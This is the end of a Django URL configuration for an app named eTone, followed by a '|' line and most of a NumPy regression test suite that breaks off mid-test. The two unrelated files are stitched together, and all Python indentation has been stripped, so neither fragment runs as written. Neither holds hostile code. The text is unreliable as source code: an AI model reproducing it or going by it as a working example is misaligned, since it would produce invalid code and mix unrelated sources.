re_path(r'^signup/$', eTone_views.signup, name='signup'),
re_path(r'^upload/$', eTone_views.upload_file, name='upload'),
re_path(r'^game/$', eTone_views.select_sound_game, name='game'),
re_path(r'^stats/$', eTone_views.get_stats, name='stats'),
re_path(r'^api/upload/(?P<typeID>[^/]?)/(?P<filename>[^/]+)$', eTone_views.FileUploadView.as_view())
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
from __future__ import division, absolute_import, print_function
import copy
import pickle
import sys
import platform
import gc
import warnings
import tempfile
from os import path
from io import BytesIO
from itertools import chain
import numpy as np
from numpy.testing import (
run_module_suite, TestCase, assert_, assert_equal,
assert_almost_equal, assert_array_equal, assert_array_almost_equal,
assert_raises, assert_warns, dec
)
from numpy.testing.utils import _assert_valid_refcount
from numpy.compat import asbytes, asunicode, asbytes_nested, long, sixu
rlevel = 1
class TestRegression(TestCase):
def test_invalid_round(self,level=rlevel):
# Ticket #3
v = 4.7599999999999998
assert_array_equal(np.array([v]), np.array(v))
def test_mem_empty(self,level=rlevel):
# Ticket #7
np.empty((1,), dtype=[('x', np.int64)])
def test_pickle_transposed(self,level=rlevel):
# Ticket #16
a = np.transpose(np.array([[2, 9], [7, 0], [3, 8]]))
f = BytesIO()
pickle.dump(a, f)
f.seek(0)
b = pickle.load(f)
f.close()
assert_array_equal(a, b)
def test_typeNA(self,level=rlevel):
# Ticket #31
assert_equal(np.typeNA[np.int64], 'Int64')
assert_equal(np.typeNA[np.uint64], 'UInt64')
def test_dtype_names(self,level=rlevel):
# Ticket #35
# Should succeed
np.dtype([(('name', 'label'), np.int32, 3)])
def test_reduce(self,level=rlevel):
# Ticket #40
assert_almost_equal(np.add.reduce([1., .5], dtype=None), 1.5)
def test_zeros_order(self,level=rlevel):
# Ticket #43
np.zeros([3], int, 'C')
np.zeros([3], order='C')
np.zeros([3], int, order='C')
def test_asarray_with_order(self,level=rlevel):
# Check that nothing is done when order='F' and array C/F-contiguous
a = np.ones(2)
assert_(a is np.asarray(a, order='F'))
def test_ravel_with_order(self,level=rlevel):
# Check that ravel works when order='F' and array C/F-contiguous
a = np.ones(2)
assert_(not a.ravel('F').flags.owndata)
def test_sort_bigendian(self,level=rlevel):
# Ticket #47
a = np.linspace(0, 10, 11)
c = a.astype(np.dtype('<f8'))
c.sort()
assert_array_almost_equal(c, a)
def test_negative_nd_indexing(self,level=rlevel):
# Ticket #49
c = np.arange(125).reshape((5, 5, 5))
origidx = np.array([-1, 0, 1])
idx = np.array(origidx)
c[idx]
assert_array_equal(idx, origidx)
def test_char_dump(self,level=rlevel):
# Ticket #50
f = BytesIO()
ca = np.char.array(np.arange(1000, 1010), itemsize=4)
ca.dump(f)
f.seek(0)
ca = np.load(f)
f.close()
def test_noncontiguous_fill(self,level=rlevel):
# Ticket #58.
a = np.zeros((5, 3))
b = a[:, :2,]
def rs():
b.shape = (10,)
self.assertRaises(AttributeError, rs)
def test_bool(self,level=rlevel):
# Ticket #60
np.bool_(1) # Should succeed
def test_indexing1(self,level=rlevel):
# Ticket #64
descr = [('x', [('y', [('z', 'c16', (2,)),]),]),]
buffer = ((([6j, 4j],),),)
h = np.array(buffer, dtype=descr)
h['x']['y']['z']
def test_indexing2(self,level=rlevel):
# Ticket #65
descr = [('x', 'i4', (2,))]
buffer = ([3, 2],)
h = np.array(buffer, dtype=descr)
h['x']
def test_round(self,level=rlevel):
# Ticket #67
x = np.array([1+2j])
assert_almost_equal(x**(-1), [1/(1+2j)])
def test_scalar_compare(self,level=rlevel):
# Trac Ticket #72
# https://github.com/numpy/numpy/issues/565
a = np.array(['test', 'auto'])
assert_array_equal(a == 'auto', np.array([False, True]))
self.assertTrue(a[1] == 'auto')
self.assertTrue(a[0] != 'auto')
b = np.linspace(0, 10, 11)
# This should return true for now, but will eventually raise an error:
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=DeprecationWarning)
self.assertTrue(b != 'auto')
self.assertTrue(b[0] != 'auto')
def test_unicode_swapping(self,level=rlevel):
# Ticket #79
ulen = 1
ucs_value = sixu('\U0010FFFF')
ua = np.array([[[ucs_value*ulen]*2]*3]*4, dtype='U%s' % ulen)
ua.newbyteorder() # Should succeed.
def test_object_array_fill(self,level=rlevel):
# Ticket #86
x = np.zeros(1, 'O')
x.fill([])
def test_mem_dtype_align(self,level=rlevel):
# Ticket #93
self.assertRaises(TypeError, np.dtype,
{'names':['a'],'formats':['foo']}, align=1)
@dec.knownfailureif((sys.version_info[0] >= 3) or
(sys.platform == "win32" and
platform.architecture()[0] == "64bit"),
"numpy.intp('0xff', 16) not supported on Py3, "
"as it does not inherit from Python int")
def test_intp(self,level=rlevel):
# Ticket #99
i_width = np.int_(0).nbytes*2 - 1
np.intp('0x' + 'f'*i_width, 16)
self.assertRaises(OverflowError, np.intp, '0x' + 'f'*(i_width+1), 16)
self.assertRaises(ValueError, np.intp, '0x1', 32)
assert_equal(255, np.intp('0xFF', 16))
assert_equal(1024, np.intp(1024))
def test_endian_bool_indexing(self,level=rlevel):
# Ticket #105
a = np.arange(10., dtype='>f8')
b = np.arange(10., dtype='<f8')
xa = np.where((a > 2) & (a < 6))
xb = np.where((b > 2) & (b < 6))
ya = ((a > 2) & (a < 6))
yb = ((b > 2) & (b < 6))
assert_array_almost_equal(xa, ya.nonzero())
assert_array_almost_equal(xb, yb.nonzero())
assert_(np.all(a[ya] > 0.5))
assert_(np.all(b[yb] > 0.5))
def test_endian_where(self,level=rlevel):
# GitHub issue #369
net = np.zeros(3, dtype='>f4')
net[1] = 0.00458849
net[2] = 0.605202
max_net = net.max()
test = np.where(net <= 0., max_net, net)
correct = np.array([ 0.60520202, 0.00458849, 0.60520202])
assert_array_almost_equal(test, correct)
def test_endian_recarray(self,level=rlevel):
# Ticket #2185
dt = np.dtype([
('head', '>u4'),
('data', '>u4', 2),
])
buf = np.recarray(1, dtype=dt)
buf[0]['head'] = 1
buf[0]['data'][:] = [1, 1]
h = buf[0]['head']
d = buf[0]['data'][0]
buf[0]['head'] = h
buf[0]['data'][0] = d
assert_(buf[0]['head'] == 1)
def test_mem_dot(self,level=rlevel):
# Ticket #106
x = np.random.randn(0, 1)
y = np.random.randn(10, 1)
# Dummy array to detect bad memory access:
_z = np.ones(10)
_dummy = np.empty((0, 10))
z = np.lib.stride_tricks.as_strided(_z, _dummy.shape, _dummy.strides)
np.dot(x, np.transpose(y), out=z)
assert_equal(_z, np.ones(10))
# Do the same for the built-in dot:
np.core.multiarray.dot(x, np.transpose(y), out=z)
assert_equal(_z, np.ones(10))
def test_arange_endian(self,level=rlevel):
# Ticket #111
ref = np.arange(10)
x = np.arange(10, dtype='<f8')
assert_array_equal(ref, x)
x = np.arange(10, dtype='>f8')
assert_array_equal(ref, x)
def test_argmax(self,level=rlevel):
# Ticket #119
a = np.random.normal(0, 1, (4, 5, 6, 7, 8))
for i in range(a.ndim):
a.argmax(i) # Should succeed
def test_mem_divmod(self,level=rlevel):
# Ticket #126
for i in range(10):
divmod(np.array([i])[0], 10)
def test_hstack_invalid_dims(self,level=rlevel):
# Ticket #128
x = np.arange(9).reshape((3, 3))
y = np.array([0, 0, 0])
self.assertRaises(ValueError, np.hstack, (x, y))
def test_squeeze_type(self,level=rlevel):
# Ticket #133
a = np.array([3])
b = np.array(3)
assert_(type(a.squeeze()) is np.ndarray)
assert_(type(b.squeeze()) is np.ndarray)
def test_add_identity(self,level=rlevel):
# Ticket #143
assert_equal(0, np.add.identity)
def test_numpy_float_python_long_addition(self):
# Check that numpy float and python longs can be added correctly.
a = np.float_(23.) + 2**135
assert_equal(a, 23. + 2**135)
def test_binary_repr_0(self,level=rlevel):
# Ticket #151
assert_equal('0', np.binary_repr(0))
def test_rec_iterate(self,level=rlevel):
# Ticket #160
descr = np.dtype([('i', int), ('f', float), ('s', '|S3')])
x = np.rec.array([(1, 1.1, '1.0'),
(2, 2.2, '2.0')], dtype=descr)
x[0].tolist()
[i for i in x[0]]
def test_unicode_string_comparison(self,level=rlevel):
# Ticket #190
a = np.array('hello', np.unicode_)
b = np.array('world')
a == b
def test_tobytes_FORTRANORDER_discontiguous(self,level=rlevel):
# Fix in r2836
# Create non-contiguous Fortran ordered array
x = np.array(np.random.rand(3, 3), order='F')[:, :2]
assert_array_almost_equal(x.ravel(), np.fromstring(x.tobytes()))
def test_flat_assignment(self,level=rlevel):
# Correct behaviour of ticket #194
x = np.empty((3, 1))
x.flat = np.arange(3)
assert_array_almost_equal(x, [[0], [1], [2]])
x.flat = np.arange(3, dtype=float)
assert_array_almost_equal(x, [[0], [1], [2]])
def test_broadcast_flat_assignment(self,level=rlevel):
# Ticket #194
x = np.empty((3, 1))
def bfa():
x[:] = np.arange(3)
def bfb():
x[:] = np.arange(3, dtype=float)
self.assertRaises(ValueError, bfa)
self.assertRaises(ValueError, bfb)
def test_nonarray_assignment(self):
# See also Issue gh-2870, test for non-array assignment
# and equivalent unsafe casted array assignment
a = np.arange(10)
b = np.ones(10, dtype=bool)
r = np.arange(10)
def assign(a, b, c):
a[b] = c
assert_raises(ValueError, assign, a, b, np.nan)
a[b] = np.array(np.nan) # but not this.
assert_raises(ValueError, assign, a, r, np.nan)
a[r] = np.array(np.nan)
def test_unpickle_dtype_with_object(self,level=rlevel):
# Implemented in r2840
dt = np.dtype([('x', int), ('y', np.object_), ('z', 'O')])
f = BytesIO()
pickle.dump(dt, f)
f.seek(0)
dt_ = pickle.load(f)
f.close()
assert_equal(dt, dt_)
def test_mem_array_creation_invalid_specification(self,level=rlevel):
# Ticket #196
dt = np.dtype([('x', int), ('y', np.object_)])
# Wrong way
self.assertRaises(ValueError, np.array, [1, 'object'], dt)
# Correct way
np.array([(1, 'object')], dt)
def test_recarray_single_element(self,level=rlevel):
# Ticket #202
a = np.array([1, 2, 3], dtype=np.int32)
b = a.copy()
r = np.rec.array(a, shape=1, formats=['3i4'], names=['d'])
assert_array_equal(a, b)
assert_equal(a, r[0][0])
def test_zero_sized_array_indexing(self,level=rlevel):
# Ticket #205
tmp = np.array([])
def index_tmp():
tmp[np.array(10)]
self.assertRaises(IndexError, index_tmp)
def test_chararray_rstrip(self,level=rlevel):
# Ticket #222
x = np.chararray((1,), 5)
x[0] = asbytes('a ')
x = x.rstrip()
assert_equal(x[0], asbytes('a'))
def test_object_array_shape(self,level=rlevel):
# Ticket #239
assert_equal(np.array([[1, 2], 3, 4], dtype=object).shape, (3,))
assert_equal(np.array([[1, 2], [3, 4]], dtype=object).shape, (2, 2))
assert_equal(np.array([(1, 2), (3, 4)], dtype=object).shape, (2, 2))
assert_equal(np.array([], dtype=object).shape, (0,))
assert_equal(np.array([[], [], []], dtype=object).shape, (3, 0))
assert_equal(np.array([[3, 4], [5, 6], None], dtype=object).shape, (3,))
def test_mem_around(self,level=rlevel):
# Ticket #243
x = np.zeros((1,))
y = [0]
decimal = 6
np.around(abs(x-y), decimal) <= 10.0**(-decimal)
def test_character_array_strip(self,level=rlevel):
# Ticket #246
x = np.char.array(("x", "x ", "x "))
for c in x:
assert_equal(c, "x")
def test_lexsort(self,level=rlevel):
# Lexsort memory error
v = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
assert_equal(np.lexsort(v), 0)
def test_lexsort_invalid_sequence(self):
# Issue gh-4123
class BuggySequence(object):
def __len__(self):
return 4
def __getitem__(self, key):
raise KeyError
assert_raises(KeyError, np.lexsort, BuggySequence())
def test_pickle_py2_bytes_encoding(self):
# Check that arrays and scalars pickled on Py2 are
# unpickleable on Py3 using encoding='bytes'
test_data = [
# (original, py2_pickle)
(np.unicode_('\u6f2c'),
asbytes("cnumpy.core.multiarray\nscalar\np0\n(cnumpy\ndtype\np1\n"
"(S'U1'\np2\nI0\nI1\ntp3\nRp4\n(I3\nS'<'\np5\nNNNI4\nI4\n"
"I0\ntp6\nbS',o\\x00\\x00'\np7\ntp8\nRp9\n.")),
(np.array([9e123], dtype=np.float64),
asbytes("cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\n"
"p1\n(I0\ntp2\nS'b'\np3\ntp4\nRp5\n(I1\n(I1\ntp6\ncnumpy\ndtype\n"
"p7\n(S'f8'\np8\nI0\nI1\ntp9\nRp10\n(I3\nS'<'\np11\nNNNI-1\nI-1\n"
"I0\ntp12\nbI00\nS'O\\x81\\xb7Z\\xaa:\\xabY'\np13\ntp14\nb.")),
(np.array([(9e123,)], dtype=[('name', float)]),
asbytes("cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\np1\n"
"(I0\ntp2\nS'b'\np3\ntp4\nRp5\n(I1\n(I1\ntp6\ncnumpy\ndtype\np7\n"
"(S'V8'\np8\nI0\nI1\ntp9\nRp10\n(I3\nS'|'\np11\nN(S'name'\np12\ntp13\n"
"(dp14\ng12\n(g7\n(S'f8'\np15\nI0\nI1\ntp16\nRp17\n(I3\nS'<'\np18\nNNNI-1\n"
"I-1\nI0\ntp19\nbI0\ntp20\nsI8\nI1\nI0\ntp21\n"
"bI00\nS'O\\x81\\xb7Z\\xaa:\\xabY'\np22\ntp23\nb.")),
]
if sys.version_info[:2] >= (3, 4):
# encoding='bytes' was added in Py3.4
for original, data in test_data:
result = pickle.loads(data, encoding='bytes')
assert_equal(result, original)
if isinstance(result, np.ndarray) and result.dtype.names:
for name in result.dtype.names:
assert_(isinstance(name, str))
def test_pickle_dtype(self,level=rlevel):
# Ticket #251
pickle.dumps(np.float)
def test_swap_real(self, level=rlevel):
# Ticket #265
assert_equal(np.arange(4, dtype='>c8').imag.max(), 0.0)
assert_equal(np.arange(4, dtype='<c8').imag.max(), 0.0)
assert_equal(np.arange(4, dtype='>c8').real.max(), 3.0)
assert_equal(np.arange(4, dtype='<c8').real.max(), 3.0)
def test_object_array_from_list(self, level=rlevel):
# Ticket #270
np.array([1, 'A', None]) # Should succeed
def test_multiple_assign(self, level=rlevel):
# Ticket #273
a = np.zeros((3, 1), int)
a[[1, 2]] = 1
def test_empty_array_type(self, level=rlevel):
assert_equal(np.array([]).dtype, np.zeros(0).dtype)
def test_void_copyswap(self, level=rlevel):
dt = np.dtype([('one', '<i4'), ('two', '<i4')])
x = np.array((1, 2), dtype=dt)
x = x.byteswap()
assert_(x['one'] > 1 and x['two'] > 2)
def test_method_args(self, level=rlevel):
# Make sure methods and functions have same default axis
# keyword and arguments
funcs1 = ['argmax', 'argmin', 'sum', ('product', 'prod'),
('sometrue', 'any'),
('alltrue', 'all'), 'cumsum', ('cumproduct', 'cumprod'),
'ptp', 'cumprod', 'prod', 'std', 'var', 'mean',
'round', 'min', 'max', 'argsort', 'sort']
funcs2 = ['compress', 'take', 'repeat']
for func in funcs1:
arr = np.random.rand(8, 7)
arr2 = arr.copy()
if isinstance(func, tuple):
func_meth = func[1]
func = func[0]
else:
func_meth = func
res1 = getattr(arr, func_meth)()
res2 = getattr(np, func)(arr2)
if res1 is None:
res1 = arr
if res1.dtype.kind in 'uib':
assert_((res1 == res2).all(), func)
else:
assert_(abs(res1-res2).max() < 1e-8, func)
for func in funcs2:
arr1 = np.random.rand(8, 7)
arr2 = np.random.rand(8, 7)
res1 = None
if func == 'compress':
arr1 = arr1.ravel()
res1 = getattr(arr2, func)(arr1)
else:
arr2 = (15*arr2).astype(int).ravel()
if res1 is None:
res1 = getattr(arr1, func)(arr2)
res2 = getattr(np, func)(arr1, arr2)
assert_(abs(res1-res2).max() < 1e-8, func)
def test_mem_lexsort_strings(self, level=rlevel):
# Ticket #298
lst = ['abc', 'cde', 'fgh']
np.lexsort((lst,))
def test_fancy_index(self, level=rlevel):
# Ticket #302
x = np.array([1, 2])[np.array([0])]
assert_equal(x.shape, (1,))
def test_recarray_copy(self, level=rlevel):
# Ticket #312
dt = [('x', np.int16), ('y', np.float64)]
ra = np.array([(1, 2.3)], dtype=dt)
rb = np.rec.array(ra, dtype=dt)
rb['x'] = 2.
assert_(ra['x'] != rb['x'])
def test_rec_fromarray(self, level=rlevel):
# Ticket #322
x1 = np.array([[1, 2], [3, 4], [5, 6]])
x2 = np.array(['a', 'dd', 'xyz'])
x3 = np.array([1.1, 2, 3])
np.rec.fromarrays([x1, x2, x3], formats="(2,)i4,a3,f8")
def test_object_array_assign(self, level=rlevel):
x = np.empty((2, 2), object)
x.flat[2] = (1, 2, 3)
assert_equal(x.flat[2], (1, 2, 3))
def test_ndmin_float64(self, level=rlevel):
# Ticket #324
x = np.array([1, 2, 3], dtype=np.float64)
assert_equal(np.array(x, dtype=np.float32, ndmin=2).ndim, 2)
assert_equal(np.array(x, dtype=np.float64, ndmin=2).ndim, 2)
def test_ndmin_order(self, level=rlevel):
# Issue #465 and related checks
assert_(np.array([1, 2], order='C', ndmin=3).flags.c_contiguous)
assert_(np.array([1, 2], order='F', ndmin=3).flags.f_contiguous)
assert_(np.array(np.ones((2, 2), order='F'), ndmin=3).flags.f_contiguous)
assert_(np.array(np.ones((2, 2), order='C'), ndmin=3).flags.c_contiguous)
def test_mem_axis_minimization(self, level=rlevel):
# Ticket #327
data = np.arange(5)
data = np.add.outer(data, data)
def test_mem_float_imag(self, level=rlevel):
# Ticket #330
np.float64(1.0).imag
def test_dtype_tuple(self, level=rlevel):
# Ticket #334
assert_(np.dtype('i4') == np.dtype(('i4', ())))
def test_dtype_posttuple(self, level=rlevel):
# Ticket #335
np.dtype([('col1', '()i4')])
def test_numeric_carray_compare(self, level=rlevel):
# Ticket #341
assert_equal(np.array(['X'], 'c'), asbytes('X'))
def test_string_array_size(self, level=rlevel):
# Ticket #342
self.assertRaises(ValueError,
np.array, [['X'], ['X', 'X', 'X']], '|S1')
def test_dtype_repr(self, level=rlevel):
# Ticket #344
dt1 = np.dtype(('uint32', 2))
dt2 = np.dtype(('uint32', (2,)))
assert_equal(dt1.__repr__(), dt2.__repr__())
def test_reshape_order(self, level=rlevel):
# Make sure reshape order works.
a = np.arange(6).reshape(2, 3, order='F')
assert_equal(a, [[0, 2, 4], [1, 3, 5]])
a = np.array([[1, 2], [3, 4], [5, 6], [7, 8]])
b = a[:, 1]
assert_equal(b.reshape(2, 2, order='F'), [[2, 6], [4, 8]])
def test_reshape_zero_strides(self, level=rlevel):
# Issue #380, test reshaping of zero strided arrays
a = np.ones(1)
a = np.lib.stride_tricks.as_strided(a, shape=(5,), strides=(0,))
assert_(a.reshape(5, 1).strides[0] == 0)
def test_reshape_zero_size(self, level=rlevel):
# GitHub Issue #2700, setting shape failed for 0-sized arrays
a = np.ones((0, 2))
a.shape = (-1, 2)
# Cannot test if NPY_RELAXED_STRIDES_CHECKING changes the strides.
# With NPY_RELAXED_STRIDES_CHECKING the test becomes superfluous.
@dec.skipif(np.ones(1).strides[0] == np.iinfo(np.intp).max)
def test_reshape_trailing_ones_strides(self):
# GitHub issue gh-2949, bad strides for trailing ones of new shape
a = np.zeros(12, dtype=np.int32)[::2] # not contiguous
strides_c = (16, 8, 8, 8)
strides_f = (8, 24, 48, 48)
assert_equal(a.reshape(3, 2, 1, 1).strides, strides_c)
assert_equal(a.reshape(3, 2, 1, 1, order='F').strides, strides_f)
assert_equal(np.array(0, dtype=np.int32).reshape(1, 1).strides, (4, 4))
def test_repeat_discont(self, level=rlevel):
# Ticket #352
a = np.arange(12).reshape(4, 3)[:, 2]
assert_equal(a.repeat(3), [2, 2, 2, 5, 5, 5, 8, 8, 8, 11, 11, 11])
def test_array_index(self, level=rlevel):
# Make sure optimization is not called in this case.
a = np.array([1, 2, 3])
a2 = np.array([[1, 2, 3]])
assert_equal(a[np.where(a == 3)], a2[np.where(a2 == 3)])
def test_object_argmax(self, level=rlevel):
a = np.array([1, 2, 3], dtype=object)
assert_(a.argmax() == 2)
def test_recarray_fields(self, level=rlevel):
# Ticket #372
dt0 = np.dtype([('f0', 'i4'), ('f1', 'i4')])
dt1 = np.dtype([('f0', 'i8'), ('f1', 'i8')])
for a in [np.array([(1, 2), (3, 4)], "i4,i4"),
np.rec.array([(1, 2), (3, 4)], "i4,i4"),
np.rec.array([(1, 2), (3, 4)]),
np.rec.fromarrays([(1, 2), (3, 4)], "i4,i4"),
np.rec.fromarrays([(1, 2), (3, 4)])]:
assert_(a.dtype in [dt0, dt1])
def test_random_shuffle(self, level=rlevel):
# Ticket #374
a = np.arange(5).reshape((5, 1))
b = a.copy()
np.random.shuffle(b)
assert_equal(np.sort(b, axis=0), a)
def test_refcount_vdot(self, level=rlevel):
# Changeset #3443
_assert_valid_refcount(np.vdot)
def test_startswith(self, level=rlevel):
ca = np.char.array(['Hi', 'There'])
assert_equal(ca.startswith('H'), [True, False])
def test_noncommutative_reduce_accumulate(self, level=rlevel):
# Ticket #413
tosubtract = np.arange(5)
todivide = np.array([2.0, 0.5, 0.25])
assert_equal(np.subtract.reduce(tosubtract), -10)
assert_equal(np.divide.reduce(todivide), 16.0)
assert_array_equal(np.subtract.accumulate(tosubtract),
np.array([0, -1, -3, -6, -10]))
assert_array_equal(np.divide.accumulate(todivide),
np.array([2., 4., 16.]))
def test_convolve_empty(self, level=rlevel):
# Convolve should raise an error for empty input array.
self.assertRaises(ValueError, np.convolve, [], [1])
self.assertRaises(ValueError, np.convolve, [1], [])
def test_multidim_byteswap(self, level=rlevel):
# Ticket #449
r = np.array([(1, (0, 1, 2))], dtype="i2,3i2")
assert_array_equal(r.byteswap(),
np.array([(256, (0, 256, 512))], r.dtype))
def test_string_NULL(self, level=rlevel):
# Changeset 3557
assert_equal(np.array("a\x00\x0b\x0c\x00").item(),
'a\x00\x0b\x0c')
def test_junk_in_string_fields_of_recarray(self, level=rlevel):
# Ticket #483
r = np.array([[asbytes('abc')]], dtype=[('var1', '|S20')])
assert_(asbytes(r['var1'][0][0]) == asbytes('abc'))
def test_take_output(self, level=rlevel):
# Ensure that 'take' honours output parameter.
x = np.arange(12).reshape((3, 4))
a = np.take(x, [0, 2], axis=1)
b = np.zeros_like(a)
np.take(x, [0, 2], axis=1, out=b)
assert_array_equal(a, b)
def test_take_object_fail(self):
# Issue gh-3001
d = 123.
a = np.array([d, 1], dtype=object)
ref_d = sys.getrefcount(d)
try:
a.take([0, 100])
except IndexError:
pass
assert_(ref_d == sys.getrefcount(d))
def test_array_str_64bit(self, level=rlevel):
# Ticket #501
s = np.array([1, np.nan], dtype=np.float64)
with np.errstate(all='raise'):
np.array_str(s) # Should succeed
def test_frompyfunc_endian(self, level=rlevel):
# Ticket #503
from math import radians
uradians = np.frompyfunc(radians, 1, 1)
big_endian = np.array([83.4, 83.5], dtype='>f8')
little_endian = np.array([83.4, 83.5], dtype='<f8')
assert_almost_equal(uradians(big_endian).astype(float),
uradians(little_endian).astype(float))
def test_mem_string_arr(self, level=rlevel):
# Ticket #514
s = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
t = []
np.hstack((t, s))
def test_arr_transpose(self, level=rlevel):
# Ticket #516
x = np.random.rand(*(2,)*16)
x.transpose(list(range(16))) # Should succeed
def test_string_mergesort(self, level=rlevel):
# Ticket #540
x = np.array(['a']*32)
assert_array_equal(x.argsort(kind='m'), np.arange(32))
def test_argmax_byteorder(self, level=rlevel):
# Ticket #546
a = np.arange(3, dtype='>f')
assert_(a[a.argmax()] == a.max())
def test_rand_seed(self, level=rlevel):
# Ticket #555
for l in np.arange(4):
np.random.seed(l)
def test_mem_deallocation_leak(self, level=rlevel):
# Ticket #562
a = np.zeros(5, dtype=float)
b = np.array(a, dtype=float)
del a, b
def test_mem_on_invalid_dtype(self):
"Ticket #583"
self.assertRaises(ValueError, np.fromiter, [['12', ''], ['13', '']], str)
def test_dot_negative_stride(self, level=rlevel):
# Ticket #588
x = np.array([[1, 5, 25, 125., 625]])
y = np.array([[20.], [160.], [640.], [1280.], [1024.]])
z = y[::-1].copy()
y2 = y[::-1]
assert_equal(np.dot(x, z), np.dot(x, y2))
def test_object_casting(self, level=rlevel):
# This used to trigger the object-type version of
# the bitwise_or operation, because float64 -> object
# casting succeeds
def rs():
x = np.ones([484, 286])
y = np.zeros([484, 286])
x |= y
self.assertRaises(TypeError, rs)
def test_unicode_scalar(self, level=rlevel):
# Ticket #600
x = np.array(["DROND", "DROND1"], dtype="U6")
el = x[1]
new = pickle.loads(pickle.dumps(el))
assert_equal(new, el)
def test_arange_non_native_dtype(self, level=rlevel):
# Ticket #616
for T in ('>f4', '<f4'):
dt = np.dtype(T)
assert_equal(np.arange(0, dtype=dt).dtype, dt)
assert_equal(np.arange(0.5, dtype=dt).dtype, dt)
assert_equal(np.arange(5, dtype=dt).dtype, dt)
def test_bool_flat_indexing_invalid_nr_elements(self, level=rlevel):
s = np.ones(10, dtype=float)
x = np.array((15,), dtype=float)
def ia(x, s, v):
x[(s > 0)] = v
# After removing deprecation, the following are ValueErrors.
# This might seem odd as compared to the value error below. This
# is due to the fact that the new code always uses "nonzero" logic
# and the boolean special case is not taken.
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
warnings.simplefilter('ignore', np.VisibleDeprecationWarning)
self.assertRaises(IndexError, ia, x, s, np.zeros(9, dtype=float))
self.assertRaises(IndexError, ia, x, s, np.zeros(11, dtype=float))
# Old special case (different code path):
self.assertRaises(ValueError, ia, x.flat, s, np.zeros(9, dtype=float))
self.assertRaises(ValueError, ia, x.flat, s, np.zeros(11, dtype=float))
def test_mem_scalar_indexing(self, level=rlevel):
# Ticket #603
x = np.array([0], dtype=float)
index = np.array(0, dtype=np.int32)
x[index]
def test_binary_repr_0_width(self, level=rlevel):
assert_equal(np.binary_repr(0, width=3), '000')
def test_fromstring(self, level=rlevel):
assert_equal(np.fromstring("12:09:09", dtype=int, sep=":"),
[12, 9, 9])
def test_searchsorted_variable_length(self, level=rlevel):
x = np.array(['a', 'aa', 'b'])
y = np.array(['d', 'e'])
assert_equal(x.searchsorted(y), [3, 3])
def test_string_argsort_with_zeros(self, level=rlevel):
# Check argsort for strings containing zeros.
x = np.fromstring("\x00\x02\x00\x01", dtype="|S2")
assert_array_equal(x.argsort(kind='m'), np.array([1, 0]))
assert_array_equal(x.argsort(kind='q'), np.array([1, 0]))
def test_string_sort_with_zeros(self, level=rlevel):
# Check sort for strings containing zeros.
x = np.fromstring("\x00\x02\x00\x01", dtype="|S2")
y = np.fromstring("\x00\x01\x00\x02", dtype="|S2")
assert_array_equal(np.sort(x, kind="q"), y)
def test_copy_detection_zero_dim(self, level=rlevel):
# Ticket #658
np.indices((0, 3, 4)).T.reshape(-1, 3)
def test_flat_byteorder(self, level=rlevel):
# Ticket #657
x = np.arange(10)
assert_array_equal(x.astype('>i4'), x.astype('<i4').flat[:])
assert_array_equal(x.astype('>i4').flat[:], x.astype('<i4'))
def test_uint64_from_negative(self, level=rlevel):
assert_equal(np.uint64(-2), np.uint64(18446744073709551614))
def test_sign_bit(self, level=rlevel):
x = np.array([0, -0.0, 0])
assert_equal(str(np.abs(x)), '[ 0. 0. 0.]')
def test_flat_index_byteswap(self, level=rlevel):
for dt in (np.dtype('<i4'), np.dtype('>i4')):
x = np.array([-1, 0, 1], dtype=dt)
assert_equal(x.flat[0].dtype, x[0].dtype)
def test_copy_detection_corner_case(self, level=rlevel):
# Ticket #658
np.indices((0, 3, 4)).T.reshape(-1, 3)
# Cannot test if NPY_RELAXED_STRIDES_CHECKING changes the strides.
# With NPY_RELAXED_STRIDES_CHECKING the test becomes superfluous,
# 0-sized reshape itself is tested elsewhere.
@dec.skipif(np.ones(1).strides[0] == np.iinfo(np.intp).max)
def test_copy_detection_corner_case2(self, level=rlevel):
# Ticket #771: strides are not set correctly when reshaping 0-sized
# arrays
b = np.indices((0, 3, 4)).T.reshape(-1, 3)
assert_equal(b.strides, (3 * b.itemsize, b.itemsize))
def test_object_array_refcounting(self, level=rlevel):
# Ticket #633
if not hasattr(sys, 'getrefcount'):
return
# NB. this is probably CPython-specific
cnt = sys.getrefcount
a = object()
b = object()
c = object()
cnt0_a = cnt(a)
cnt0_b = cnt(b)
cnt0_c = cnt(c)
# -- 0d -> 1-d broadcast slice assignment
arr = np.zeros(5, dtype=np.object_)
arr[:] = a
assert_equal(cnt(a), cnt0_a + 5)
arr[:] = b
assert_equal(cnt(a), cnt0_a)
assert_equal(cnt(b), cnt0_b + 5)
arr[:2] = c
assert_equal(cnt(b), cnt0_b + 3)
assert_equal(cnt(c), cnt0_c + 2)
del arr
# -- 1-d -> 2-d broadcast slice assignment
arr = np.zeros((5, 2), dtype=np.object_)
arr0 = np.zeros(2, dtype=np.object_)
arr0[0] = a
assert_(cnt(a) == cnt0_a + 1)
arr0[1] = b
assert_(cnt(b) == cnt0_b + 1)
arr[:,:] = arr0
assert_(cnt(a) == cnt0_a + 6)
assert_(cnt(b) == cnt0_b + 6)
arr[:, 0] = None
assert_(cnt(a) == cnt0_a + 1)
del arr, arr0
# -- 2-d copying + flattening
arr = np.zeros((5, 2), dtype=np.object_)
arr[:, 0] = a
arr[:, 1] = b
assert_(cnt(a) == cnt0_a + 5)
assert_(cnt(b) == cnt0_b + 5)
arr2 = arr.copy()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 10)
arr2 = arr[:, 0].copy()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 5)
arr2 = arr.flatten()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 10)
del arr, arr2
# -- concatenate, repeat, take, choose
arr1 = np.zeros((5, 1), dtype=np.object_)
arr2 = np.zeros((5, 1), dtype=np.object_)
arr1[...] = a
arr2[...] = b
assert_(cnt(a) == cnt0_a + 5)
assert_(cnt(b) == cnt0_b + 5)
tmp = np.concatenate((arr1, arr2))
assert_(cnt(a) == cnt0_a + 5 + 5)
assert_(cnt(b) == cnt0_b + 5 + 5)
tmp = arr1.repeat(3, axis=0)
